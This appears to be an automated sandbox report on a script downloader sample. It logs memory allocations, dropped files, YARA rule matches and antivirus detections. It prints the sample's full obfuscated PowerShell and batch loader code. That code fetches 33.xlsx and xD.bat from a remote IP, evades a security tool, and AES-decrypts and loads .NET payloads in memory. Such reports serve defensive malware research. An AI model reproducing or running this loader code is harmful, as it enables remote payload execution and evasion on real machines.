protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02676000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04be9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04beb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bf3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\~$33.xlsx
file C:\Users\test22\AppData\Roaming\33.xlsx
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk
file C:\Users\test22\AppData\Roaming\xD.bat
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\33.xlsx.LNK
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000438
filepath: C:\Users\test22\AppData\Roaming\~$33.xlsx
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Roaming\~$33.xlsx
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\index.dat
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\33.xlsx.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($JbCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-Process $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJymo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721,64762,64759,64755,64764,64770));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJymo.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlCCwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};function XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $aLjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64705,64705,64700,64774,64762,64769,64774));APgmbjLOXLyDCo $aLjfwbQTGPkIcn $xnvLVBnevhBEnLRIzgp;Invoke-Item $aLjfwbQTGPkIcn;};$bZgJKEnoQHIlgQ = $YDrprhvMBVQKEHdY + 'xD.bat'; if (Test-Path -Path $bZgJKEnoQHIlgQ){EAdhMqKTsBgn $bZgJKEnoQHIlgQ;}Else{ $shhld = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64774,64722,64700,64752,64751,64770));APgmbjLOXLyDCo $bZgJKEnoQHIlgQ $shhld;EAdhMqKTsBgn $bZgJKEnoQHIlgQ;};;;;}XEctGdesQtRZym;
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
cmdline C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmdline powershell.exe -ExecutionPolicy UnRestricted function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($JbCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-Process $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJymo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721,64762,64759,64755,64764,64770));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJymo.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlCCwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};function XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $aLjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64705,64705,64700,64774,64762,64769,64774));APgmbjLOXLyDCo $aLjfwbQTGPkIcn $xnvLVBnevhBEnLRIzgp;Invoke-Item $aLjfwbQTGPkIcn;};$bZgJKEnoQHIlgQ = $YDrprhvMBVQKEHdY + 'xD.bat'; if (Test-Path -Path $bZgJKEnoQHIlgQ){EAdhMqKTsBgn $bZgJKEnoQHIlgQ;}Else{ $shhld = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64774,64722,64700,64752,64751,64770));APgmbjLOXLyDCo $bZgJKEnoQHIlgQ $shhld;EAdhMqKTsBgn $bZgJKEnoQHIlgQ;};;;;}XEctGdesQtRZym;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function APgmbjLOXLyDCo($JbCqR, $haYSvpsUITIjCDP){[IO.File]::WriteAllBytes($JbCqR, $haYSvpsUITIjCDP)};function EAdhMqKTsBgn($JbCqR){if($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64754,64762,64762))) -eq $True){rundll32.exe $JbCqR }elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64766,64769,64703))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $JbCqR}elseif($JbCqR.EndsWith((uGIVecNMsbxk @(64700,64763,64769,64759))) -eq $True){misexec /qn /i $JbCqR}else{Start-Process $JbCqR}};function wjPCvObwAmjJyUdaXG($gQOBxNAyeHpqX){$dDskdaHYdZknHXzXJymo = New-Object (uGIVecNMsbxk @(64732,64755,64770,64700,64741,64755,64752,64721,64762,64759,64755,64764,64770));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$haYSvpsUITIjCDP = $dDskdaHYdZknHXzXJymo.DownloadData($gQOBxNAyeHpqX);return $haYSvpsUITIjCDP};function uGIVecNMsbxk($lugVvlCCwkT){$GJPGF=64654;$FkAAPhCqeNqpA=$Null;foreach($bUICCliWWpr in $lugVvlCCwkT){$FkAAPhCqeNqpA+=[char]($bUICCliWWpr-$GJPGF)};return $FkAAPhCqeNqpA};function XEctGdesQtRZym(){$YDrprhvMBVQKEHdY = $env:AppData + '\';$aLjfwbQTGPkIcn = $YDrprhvMBVQKEHdY + '33.xlsx';If(Test-Path -Path $aLjfwbQTGPkIcn){Invoke-Item $aLjfwbQTGPkIcn;}Else{ $xnvLVBnevhBEnLRIzgp = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64705,64705,64700,64774,64762,64769,64774));APgmbjLOXLyDCo $aLjfwbQTGPkIcn $xnvLVBnevhBEnLRIzgp;Invoke-Item $aLjfwbQTGPkIcn;};$bZgJKEnoQHIlgQ = $YDrprhvMBVQKEHdY + 'xD.bat'; if (Test-Path -Path $bZgJKEnoQHIlgQ){EAdhMqKTsBgn $bZgJKEnoQHIlgQ;}Else{ $shhld = wjPCvObwAmjJyUdaXG (uGIVecNMsbxk @(64758,64770,64770,64766,64712,64701,64701,64703,64711,64705,64700,64704,64704,64704,64700,64711,64708,64700,64703,64704,64706,64712,64709,64704,64710,64709,64701,64774,64722,64700,64752,64751,64770));APgmbjLOXLyDCo $bZgJKEnoQHIlgQ $shhld;EAdhMqKTsBgn $bZgJKEnoQHIlgQ;};;;;}XEctGdesQtRZym;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK
Data received Content-Length: 33246 Content-Type: application/octet-stream Connection:close PK!bîh^[Content_Types].xml ¢( ¬”ËNÃ0E÷HüCä-Jܲ@5í‚Ç*Q>Àēƪc[žiiÿž‰ûB¡j7±ÏÜ{2ñÍh²nm¶‚ˆÆ»R ‹ÈÀU^7/ÅÇì%¿’rZYï @1__f›˜q·ÃR4DáAJ¬h>€ãÚÇVßƹ ªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I‹"{Üv^¥P!XS)bR¹rú—K¾s(¸3Õ`cÞ0†½ÝÎß»¾7M4²©ŠôªZƐk+¿|\|z¿(Ž‹ôPúº6h_-[ž@!‚ÒØPk‹´­2nÏ}Ä?£LËð Ýû%áÄßdºždN"m,à¥ÇžDO97*‚~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}‡íàÈé;{ìÐå[ƒîñ–é2þÿÿPK!µU0#ôL _rels/.rels ¢( ¬’MOÃ0 †ïHü‡È÷ÕݐBKwAH»!T~€Iܵ£$Ý¿'TƒG½~üÊÛÝ<êÈ!öâ4¬‹;#¶w­†—úqu*&r–Fq¬áÄvÕõÕö™GJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥†=™ZÆMYÞbø®ÕBSí­†°·7 ê“Ï›ז¦é ?ˆ9LìҙÈsbgÙ®|Èl!õùUSh9i°bžr:"y_dlÀóD›¿ý|-NœÈR"4ø2ÏGÇ% õZ´4ñ˝yÄ7 ëÈðɂ‹¨ÞÿÿPK!Y”»CüÑxl/workbook.xml¬UÛn£0}_iÿùb •T¤ÚJÝUÕëK¤•N±˜µM“ªê¿ï˜„ô’—n»|aÌñ™™ãáødS•Ö“Š‹:Fä#‹Õ™Èy}£›ëS{„,¥iÓRÔ,FL¡“ñ÷oÇk!W !VÔ*F…ÖMä8*+XEՑhX –¥Õ0•÷Žj$£¹*ÓUé¸NEy¶‘ü†X.yƦ"k+Vë-ˆd%Õ@_¼Q=Z•}®¢rÕ6v&ª ¼äú±EV•Eg÷µtQ‚Ûâ[ wÁиýN`:تâ™J,õ@;[Òþìò&›Ã| És${à&‡{V2ø$«`¼€üe4Òê´
Data sent GET /33.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
Data sent GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
host 193.222.96.124
file C:\Users\test22\AppData\Roaming\33.xlsx
file C:\Users\test22\AppData\Roaming\xD.bat
Time & API Arguments Status Return Repeated

send

buffer: GET /33.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
socket: 1436
sent: 76
1 76 0

send

buffer: GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
socket: 880
sent: 51
1 51 0
cve CVE-2013-3906
parent_process powershell.exe martian_process "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\xD.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\xD.bat
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\33.xlsx
Process injection Process 2976 resumed a thread in remote process 3052
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 3052
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Skyhigh HTA/Downloader.f
ALYac VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
ESET-NOD32 VBS/Agent.QVR
McAfee HTA/Downloader.f
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
MAX malware (ai score=85)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]